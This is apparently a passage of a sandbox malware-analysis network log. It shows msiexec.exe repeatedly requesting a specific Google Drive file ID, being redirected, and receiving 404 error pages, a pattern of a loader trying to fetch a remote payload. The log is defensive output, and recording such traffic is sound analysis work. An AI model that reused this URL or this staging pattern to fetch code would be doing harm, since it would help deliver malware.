                                                              2025-01-10 23:02:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 4b 70 61 75 68 70 69 72 53 75 6b 46 64 7a 52 66 4b 42 4b 6e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eKpauhpirSukFdzRfKBKng">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.849757216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:46 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:47 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:46 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-Hi0p9QAUsVoY8VMqqSHx2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.849758172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:47 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:48 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC7PpJygco78OAPaK3hFG88oonTt-210VLZpt1h3UkWp4KJjvNTfvmGNA8z53oNzaRXvJhY0Hm0
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:48 GMT
                                                              Content-Security-Policy: script-src 'nonce-zorbvJy5_Y_vFdXBlwFtvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:48 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 52 6f 51 58 30 57 59 5a 49 57 65 7a 4f 62 56 7a 4f 65 65 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TRoQX0WYZIWezObVzOeebA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.849759216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:49 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:49 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:49 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-5DtwSFeB2iP5bkjapYTImQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.849760172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:50 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:50 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQdH2qI21pfkijE6AqVGEfGxcmAmFSxdvKQQXu42vBc6g9j9DntnMdn8Mrp-HHfcEZ-
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:50 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-Tknkkwpyd_Y7h1Ylp6MlTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 4d 47 6d 4d 4b 31 73 64 4c 61 48 53 35 47 45 45 46 31 43 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-MGmMK1sdLaHS5GEEF1Ccg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.849761216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:51 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:51 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:51 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-g2-y1JaSljKc5Ys-1ZFRBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              53192.168.2.849762172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:52 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:52 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQkBoNgBV_8BSIdlgQQwj28T0IQz8kJpZcNXuJxeZwDfnGxVwOHA2p494g7uJsAgCeC4ATGDgY
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:52 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-v-MOaZowg8EwsNz76hMwhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 56 37 34 41 4f 47 4e 30 75 52 57 5f 6f 71 62 53 4b 39 5f 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8V74AOGN0uRW_oqbSK9_SQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              54192.168.2.849763216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:53 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:53 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:53 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-sRWNHZHlMjiDwpDsBTKR0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              55192.168.2.849764172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:54 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:55 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRGOSH3aadEM-ryRfiG3x_EOBJRVVXZnjzEOg_I9Kvh6FA3IrU8P40OtZH0J7u6r7LB
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:54 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
